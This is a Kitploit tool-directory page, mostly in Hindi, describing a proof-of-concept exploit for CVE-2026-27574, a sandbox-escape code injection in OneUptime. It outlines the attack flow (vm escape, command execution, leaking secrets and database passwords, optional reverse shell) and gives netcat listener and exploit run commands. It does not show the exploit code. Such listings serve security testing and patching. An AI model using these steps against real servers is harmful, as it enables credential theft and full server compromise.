Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-27574-OneUptime-RCE — CVE-2026-27574 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, OneUptime में एक गंभीर कोड इंजेक्शन जो रिमोट कोड निष्पादन और पर्यावरण चर रिसाव को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/mbanyamer/cve-2026-27574-oneuptime-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubmbanyamer/cve-2026-27574-oneuptime-rce

CVE-2026-27574-OneUptime-RCE

CVE-2026-27574 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, OneUptime में एक गंभीर कोड इंजेक्शन जो रिमोट कोड निष्पादन और पर्यावरण चर रिसाव को सक्षम बनाता है।

रिपॉजिटरी देखें
156 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-27574-OneUptime-RCE

Author Role Country Platform Vulnerability CVE CVSS Status

अवलोकन

CVE-2026-27574 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट – OneUptime < 10.0.0 में एक गंभीर कोड इंजेक्शन भेद्यता (CWE-94) जो प्रोब संदर्भ में मनमाना JavaScript निष्पादन की अनुमति देती है, जिससे पूर्ण और संवेदनशील पर्यावरण चर का रिसाव होता है।

रिमोट कोड निष्पादन (RCE)

इसमें ठीक किया गया: OneUptime 10.0.0 (isolated-vm में माइग्रेशन)

एक्सप्लॉइट प्रकार: रिमोट
प्रमाणीकरण: निम्न-विशेषाधिकार (कोई भी पंजीकृत प्रोजेक्ट सदस्य)
प्रभाव: पूर्ण सर्वर समझौता, क्रेडेंशियल चोरी, क्लस्टर अधिग्रहण

अटैक फ्लो आरेख

root@kitploit:~
flowchart TD
    A[Start] --> B[Open Registration]
    B --> C[Register New Account]
    C --> D[Create New Project]
    D --> E[Obtain ProjectMember Role]
    E --> F[Create Custom JavaScript Monitor]
    F --> G[Inject Malicious vm Escape Payload]
    G --> H[Probe Executes Code Every ~60s]
    H --> I[Escape vm Context via constructor chain]
    I --> J[Access process & child_process]
    J --> K[Execute System Commands]
    J --> L[Leak Environment Variables]
    K --> M[Read /etc/passwd, id, hostname, etc.]
    L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
    M --> O[Full RCE Achieved]
    N --> O
    O --> P[Optional: Reverse Shell / Data Exfiltration]
    P --> Q[End - System Compromised]

इस PoC की विशेषताएं

  • स्वचालित खाता पंजीकरण
  • प्रोजेक्ट निर्माण
  • दुर्भावनापूर्ण JavaScript मॉनिटर निर्माण
  • पर्यावरण चर रिसाव
  • बुनियादी कमांड निष्पादन प्रमाण
  • वैकल्पिक रिवर्स शेल पेलोड (टिप्पणी की गई)

उपयोग

root@kitploit:~
# Start listener (if using reverse shell)
nc -lvnp 4444

# Run the exploit
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444

आवश्यकताएं

  • Python 3.6+
  • requests लाइब्रेरी (pip install requests)

कानूनी और नैतिक सूचना

यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।

संदर्भ

  • GitHub सलाहकार GHSA-v264-xqh4-9xmm
  • पैच कमिट

Mohammed Idrees Banyamer द्वारा विकसित • जॉर्डन • @banyamer_security

टूल डाउनलोड करें